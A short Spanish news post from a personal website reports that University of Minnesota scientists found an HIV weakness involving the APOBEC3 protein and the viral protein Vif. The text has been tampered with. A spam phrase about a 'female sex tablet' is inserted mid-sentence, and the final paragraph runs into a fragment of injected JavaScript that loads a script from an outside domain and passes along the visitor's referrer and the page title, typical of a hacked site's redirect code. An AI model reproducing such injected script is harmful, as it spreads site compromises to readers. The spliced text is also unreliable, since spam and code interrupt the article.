Home / Publicaciones / Actualidades / Descubren Debilidad En El Virus VIH

Descubren Debilidad En El Virus VIH

En un reportaje de la cadena ABC, científicos de la Universidad de Minnesota descubrieron la debilidad en un punto del virus de la inmunodeficiencia humana (VIH) female sex tablet in hindi < !more>, arrojando luz del porque algunos individuos se contagian de forma rápida y otros son inmunes. El VIH debilita el sistema inmunológico de las personas, cuando progresivamente este se deteriora, entones es cuando se produce el “síndrome de inmunodeficiencia adquirida (Sida)” sin embargo, algunas personas se enferman con rapidez otras desarrollan el Sida con lentitud o nisiquiera llegan a padecerlo.
Los científicos explicaron que el cuerpo humano utiliza un antiviral de los linfocitos T que contienen la proteína llamada APOBEC3 que es lo que ataca al VIH. Sin embargo el VIH tiene un mecanismo de lucha utilizando la proteína Vif que neutraiza a la proteína APOBEC3. Los expertos descubrieron que cada persona posee gen variante de la proteína APOBEC3 y esta es la clave del contraataque del virus.

Ahora están buscando la forma de impedir que la proteína vif eliminen las enzimas APOBEC3. Con este enfoque podrían eliminar definitivamente el desarrollo del virus, e incluso lograr la cura.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...